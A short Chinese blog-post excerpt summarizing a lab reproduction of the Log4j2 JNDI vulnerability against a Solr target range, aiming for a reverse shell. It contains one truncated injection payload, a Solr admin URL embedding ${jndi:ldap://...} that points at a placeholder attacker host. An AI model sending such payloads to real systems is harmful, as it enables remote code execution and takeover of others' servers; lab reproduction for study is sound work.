2023年3月31日
log4j2漏洞复现
摘要: 【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba 阅读全文
posted @ 2023-03-31 10:37 向上的熊心 阅读(220) 评论(0) 推荐(0)